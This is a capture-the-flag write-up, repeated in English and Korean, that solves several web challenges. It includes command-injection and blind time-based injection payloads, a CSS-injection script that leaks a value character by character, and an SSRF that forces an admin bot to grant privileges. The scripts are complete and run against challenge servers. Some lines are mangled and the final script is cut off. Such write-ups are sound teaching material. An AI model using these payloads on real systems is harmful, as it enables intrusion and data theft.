Table of contents
Ping2 (100pt, 140solves)
- keywords:
command injection
from requests import *
url = ''
res = post(url+'/bing.php', data={'Submit': True, 'ip': ';cacatt${IFS}/flaflagg.txt'})
bing_revenge (100pt, 84solves)
- keywords:
blind command injection
from time import time
from requests import *
import string
from tqdm import tqdm
url = ''
flagString = string.digits+'abcdef'+'-' # I first tried with string.printable
flag = 'DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}'
for i in range(len(flag), 100):
for j in tqdm(flagString):
start = time()
res = post(url+'/flag', data={'host':f'''/dev/null;python -c "__import__('time').sleep(10) if open('/flag.txt').read()[{i}] == '{j}' else None"'''})
if time() - start > 10:
print('Found:', flag+j)
flag += j
Colorful Board (360pt, 15solves, 🩸firstblood)
- keywords:
css injection
,mongodb id prediection
Yay! I first-blooded CTF challenge for the first time in my life.
Analysis & Exploit
this challenge consists Nest.js and mongodb. First, I search a flag in the app.
const init_db = async () => {
await db.users.insertMany([
{ username: "DEAD{THIS_IS_", password: "dummy", personalColor: "#000000", isAdmin: true },
await delay(randomDelay());
await db.notices.insertOne({ title: "asdf", content: "asdf" });
await delay(randomDelay());
await db.notices.insertOne({ title: "flag", content: "FAKE_FLAG}" });
await delay(randomDelay());
await db.notices.insertOne({ title: "qwer", content: "qwer" });
the flag is devided into two and the first one is Admin’s username and the second one is one of notices. And there is /report
route that make a admin visit a url. (No restrictions on url)
After that, I found this code in post.hbs
and post-edit.hbs
.author {
color: {{{ author.personalColor }}}
.user {
color: {{{ user.personalColor }}}
.edit-button {
position: absolute;
top: 10px;
right: 10px;
this code is vulnerable to css injection because they using {{{ }}}
instead {{ }}
. So, we can do css injection by inject some code to author.personalColor
or user.personalColor
Let’s read post.hbs
and post-edit.hbs
to know attack-vector.
(The css code that came out earlier)
<div class="container">
<p class="author">Author: {{author.username}}</p>
<p class="user">Your account: {{user.username}}</p>
{{#if user.isAdmin}}
<a href="/post/edit/{{}}" class="button danger">수정</a>
<div class="post-content">
<a href="/post" class="button">Go to Posts</a>
In post.hbs
, there is no attack point to css injection because name of admin is revealed in <p>
tag. Nothing that could leak . It is possible this selection innerText
of <p>
but it doesn’t work on this chall.
(The css code that came out earlier)
<div class="container">
<h1>Colorful Board</h1>
<div class="user-info">
{{#if user}}
<span class="username">{{user.username}}</span>
<a onclick="logout()" class="button">Logout</a>
<div class="container">
<h2>Edit Post</h2>
<p>Author: <input class="author" type="text" value="{{author.username}}" disabled></p>
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
<div id="new-post">
<label for="title">Title</label>
<input type="text" id="title" name="title" value="{{post.title}}" required>
<label for="content">Content</label>
<textarea id="content" name="content" required>{{post.content}}</textarea>
<button id="submit" class="button">Edit</button>
(some script)
Wow, there is input
that shows current username!
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
Finally we can do css injection like this code and get first part of flag.
input[class=user][value^="DEAD{....."] {
background: url(''+'?flag='+flag)
To get second part of flag, we should look at the /admin/notice
in admin.controller.ts
export class AdminController {
private readonly adminService: AdminService
) { }
async grantPerm(@Query('username') username: string) {
return await this.adminService.authorize(username);
async renderAllNotice() {
const notices = await this.adminService.getAllNotice();
return { notices: notices.filter(notice => !notice.title.includes("flag")) };
async test(@Query('url') url: string) {
await this.adminService.viewUrl(url);
return { status: 200, message: 'Reported.' };
async renderNotice(@Param('id') id: Types.ObjectId) {
const notice = await this.adminService.getNotice(id);
return { notice: notice };
To access /admin/notice
, you need to get admin. Hmm…
Let’s read LocalOnlyGuard
in /admin/grant
export class LocalOnlyGuard implements CanActivate {
context: ExecutionContext,
): boolean | Promise<boolean> | Observable<boolean> {
const req = context.switchToHttp().getRequest();
const clientIp = req.ip;
const localIps = ['', '::1', '::ffff:'];
if (localIps.includes(clientIp)) {
return true;
} else {
throw new HttpException('Only Local!', 404);
Oh! This code only checks wheter access ip is localhost. Even this /admin/grant
route is GET!!! So, we can use SSRF to grant our account by report function.
After you are granted, /admin/notice
shows only two notice because flag notice is filtered.
async renderAllNotice() {
const notices = await this.adminService.getAllNotice();
return { notices: notices.filter(notice => !notice.title.includes("flag")) };
id of first report (asdf) was 66a48616b3027e48519f2d68
id of sencond report (qwer) was 66a4861db3027e48519f2d6a
mongodb’s id is predictable because of this logic.
so, id of flag report may be 66a4861{7-c}b3027e48519f2d69
Exploit Code
import string
from requests import *
from tqdm import tqdm
url = ''
flagString = ' _}'+string.ascii_letters+string.digits
eq = 5
def split_string_equally(s, n):
length = len(s)
part_size = length // n
remainder = length % n
parts = []
start = 0
for i in range(n):
end = start + part_size + (1 if i < remainder else 0)
start = end
return parts
def makeCSS(flag, n):
css = ''
print(split_string_equally(flagString, eq)[n])
for i in split_string_equally(flagString, eq)[n]:
css += 'input[class=user][value^="'+flag+i+'"]{background: url(\''+flag+i+'\');}\n'''
return css
flag = 'DEAD{Enj0y_y0ur_'
for i in tqdm(range(len(flag), 30)):
for j in range(eq):
post(url+'/auth/register', json={'username': f'{j}exon{i}', 'password': 'exon','personalColor': '''#000000}\n''' + makeCSS(flag, j) + 'test {\n'})
s = Session()
res ='/auth/login', json={'username': f'{j}exon{i}', 'password': 'exon'})
s.cookies['accessToken'] = res.json()['accessToken']
res ='/post/write', json={'content': 'test', 'title': 'test'})
res = s.get(url+'/post/all')
postId = res.json()[0]['_id']
res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId)
a = input()
flag += a
post(url+'/auth/register', json={'username': 'exon', 'password': 'exon','personalColor': '''#000000}\n
input{background: url('http://localhost:1337/admin/grant?username=exon');}\n
test {\n'''})
s = Session()
res ='/auth/login', json={'username': 'exon', 'password': 'exon'})
s.cookies['accessToken'] = res.json()['accessToken']
res ='/post/write', json={'content': 'test', 'title': 'test'})
res = s.get(url+'/post/all')
postId = res.json()[0]['_id']
res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId)
# 66a48616b3027e48519f2d68
# 66a48616b3027e48519f2d69
# 66a4861db3027e48519f2d6a
# hand brute-force
FLAG: DEAD{Enj0y_y0ur_c010rful_w3b_with_c55}
Mic check (100pt, 264solves, 🩸firstblood)
- keywords:
from pwn import *
# Connect to the remote server
p = remote('', 30827)
for i in range(100):
p.recvuntil('mic test > ')
a = p.recvuntil(b' [').decode().split(' [')[0]
Table of contents
Ping2 (100pt, 140solves)
- keywords:
command injection
from requests import *
url = ''
res = post(url+'/bing.php', data={'Submit': True, 'ip': ';cacatt${IFS}/flaflagg.txt'})
bing_revenge (100pt, 84solves)
- keywords:
blind command injection
from time import time
from requests import *
import string
from tqdm import tqdm
url = ''
flagString = string.digits+'abcdef'+'-' # I first tried with string.printable
flag = 'DEAD{f93efeba-0d78-4130-9114-783f2cd337e3}'
for i in range(len(flag), 100):
for j in tqdm(flagString):
start = time()
res = post(url+'/flag', data={'host':f'''/dev/null;python -c "__import__('time').sleep(10) if open('/flag.txt').read()[{i}] == '{j}' else None"'''})
if time() - start > 10:
print('Found:', flag+j)
flag += j
Colorful Board (360pt, 15solves, 🩸firstblood)
- keywords:
css injection
,mongodb id prediection
내 인생 처음으로 CTF에서 퍼스트 블러드했다.
Analysis & Exploit
Nest.js와 mongodb로 구성되어 있는 문제이다. 먼저 플래그를 검색해 역으로 분석을 시작했다.
const init_db = async () => {
await db.users.insertMany([
{ username: "DEAD{THIS_IS_", password: "dummy", personalColor: "#000000", isAdmin: true },
await delay(randomDelay());
await db.notices.insertOne({ title: "asdf", content: "asdf" });
await delay(randomDelay());
await db.notices.insertOne({ title: "flag", content: "FAKE_FLAG}" });
await delay(randomDelay());
await db.notices.insertOne({ title: "qwer", content: "qwer" });
플래그가 반쪽 두개로 나뉘어 하나는 어드민의 이름으로, 다른 하나는 공지의 내용으로 나뉘어졌다. 그리고 /report
루트로 어드민을 url에 접속시킬 수 있다. (참고로 url에 대한 제한은 전혀 없다.)
그러고 나서 post.hbs
와 post-edit.hbs
를 봤다.
.author {
color: {{{ author.personalColor }}}
.user {
color: {{{ user.personalColor }}}
.edit-button {
position: absolute;
top: 10px;
right: 10px;
이 코드는 {{ }}
대신 {{{ }}}
를 써서 css injection이 가능하다. 즉 author.personalColor
또는 user.personalColor
를 css에 주입시켜서 css injection을 발생시킬 수 있다. 더 자세한 공격 벡터를 찾기 위해 post.hbs
와 post-edit.hbs
를 봐보자.
(The css code that came out earlier)
<div class="container">
<p class="author">Author: {{author.username}}</p>
<p class="user">Your account: {{user.username}}</p>
{{#if user.isAdmin}}
<a href="/post/edit/{{}}" class="button danger">수정</a>
<div class="post-content">
<a href="/post" class="button">Go to Posts</a>
에서는 admin 이름이 노출된 곳이 <p>
태그 밖에 없다. p 태그의 innerText
를 css injection 하는 것은 불가능하다.고 생각했는데#:~:text={urllib.parse.quote(flag)}
이런 형식으로 가능하다. 하지만 이 문제에서는 작동되지 않는다고 한다. (본인은 직접 안해봄)
(The css code that came out earlier)
<div class="container">
<h1>Colorful Board</h1>
<div class="user-info">
{{#if user}}
<span class="username">{{user.username}}</span>
<a onclick="logout()" class="button">Logout</a>
<div class="container">
<h2>Edit Post</h2>
<p>Author: <input class="author" type="text" value="{{author.username}}" disabled></p>
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
<div id="new-post">
<label for="title">Title</label>
<input type="text" id="title" name="title" value="{{post.title}}" required>
<label for="content">Content</label>
<textarea id="content" name="content" required>{{post.content}}</textarea>
<button id="submit" class="button">Edit</button>
(some script)
이번엔 현재 유저이름을 알려주는 input
이 있다!
<p>Your account: <input class="user" type="text" value="{{user.username}}" disabled></p>
드디어 css injection을 하고 flag의 첫부분을 알 수 있다.
input[class=user][value^="DEAD{....."] {
background: url(''+'?flag='+flag)
이제 플래그의 두번째 부분을 알게 위해 /admin/notice
엔드포인트를 봐보자
in admin.controller.ts
export class AdminController {
private readonly adminService: AdminService
) { }
async grantPerm(@Query('username') username: string) {
return await this.adminService.authorize(username);
async renderAllNotice() {
const notices = await this.adminService.getAllNotice();
return { notices: notices.filter(notice => !notice.title.includes("flag")) };
async test(@Query('url') url: string) {
await this.adminService.viewUrl(url);
return { status: 200, message: 'Reported.' };
async renderNotice(@Param('id') id: Types.ObjectId) {
const notice = await this.adminService.getNotice(id);
return { notice: notice };
에 접근하기 위해 admin 권한이 필요하다…흠..
유저의 권한을 높이는 /admin/grant
를 사용하기 위해 LocalOnlyGuard
를 읽어보자
export class LocalOnlyGuard implements CanActivate {
context: ExecutionContext,
): boolean | Promise<boolean> | Observable<boolean> {
const req = context.switchToHttp().getRequest();
const clientIp = req.ip;
const localIps = ['', '::1', '::ffff:'];
if (localIps.includes(clientIp)) {
return true;
} else {
throw new HttpException('Only Local!', 404);
이 코드는 접근된 ip가 로컬호스트인지만 확인한다. 심지어 /admin/grant
에 접근하는 method는 GET이다!! 즉 /report
를 사용하여 SSRF를 진행해 우리의 계정을 admin 권한으로 높일 수 있다.
어드민 권한을 얻으면, /admin/notice
는 오직 두 개의 notice만 보여준다. 왜냐면 아래 코드에서 flag가 들어간 notice를 필터링하기 때문이다.
async renderAllNotice() {
const notices = await this.adminService.getAllNotice();
return { notices: notices.filter(notice => !notice.title.includes("flag")) };
첫 report (asdf)의 id: 66a48616b3027e48519f2d68
두번째 report (qwer)의 id: 66a4861db3027e48519f2d6a
mongodb의 id는 다음과 같은 로직으로 생성되기 때문에 예측이 가능하다. 그러므로 flag report의 id는 66a4861{7-c}b3027e48519f2d69
중 하나이다.
Exploit Code
import string
from requests import *
from tqdm import tqdm
url = ''
flagString = ' _}'+string.ascii_letters+string.digits
eq = 5
def split_string_equally(s, n):
length = len(s)
part_size = length // n
remainder = length % n
parts = []
start = 0
for i in range(n):
end = start + part_size + (1 if i < remainder else 0)
start = end
return parts
def makeCSS(flag, n):
css = ''
print(split_string_equally(flagString, eq)[n])
for i in split_string_equally(flagString, eq)[n]:
css += 'input[class=user][value^="'+flag+i+'"]{background: url(\''+flag+i+'\');}\n'''
return css
flag = 'DEAD{Enj0y_y0ur_'
for i in tqdm(range(len(flag), 30)):
for j in range(eq):
post(url+'/auth/register', json={'username': f'{j}exon{i}', 'password': 'exon','personalColor': '''#000000}\n''' + makeCSS(flag, j) + 'test {\n'})
s = Session()
res ='/auth/login', json={'username': f'{j}exon{i}', 'password': 'exon'})
s.cookies['accessToken'] = res.json()['accessToken']
res ='/post/write', json={'content': 'test', 'title': 'test'})
res = s.get(url+'/post/all')
postId = res.json()[0]['_id']
res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId)
a = input()
flag += a
post(url+'/auth/register', json={'username': 'exon', 'password': 'exon','personalColor': '''#000000}\n
input{background: url('http://localhost:1337/admin/grant?username=exon');}\n
test {\n'''})
s = Session()
res ='/auth/login', json={'username': 'exon', 'password': 'exon'})
s.cookies['accessToken'] = res.json()['accessToken']
res ='/post/write', json={'content': 'test', 'title': 'test'})
res = s.get(url+'/post/all')
postId = res.json()[0]['_id']
res = s.get(url+'/admin/report?url=http://localhost:1337/post/edit/'+postId)
# 66a48616b3027e48519f2d68
# 66a48616b3027e48519f2d69
# 66a4861db3027e48519f2d6a
# hand brute-force
FLAG: DEAD{Enj0y_y0ur_c010rful_w3b_with_c55}
Mic check (100pt, 264solves, 🩸firstblood)
- keywords:
from pwn import *
# Connect to the remote server
p = remote('', 30827)
for i in range(100):
p.recvuntil('mic test > ')
a = p.recvuntil(b' [').decode().split(' [')[0]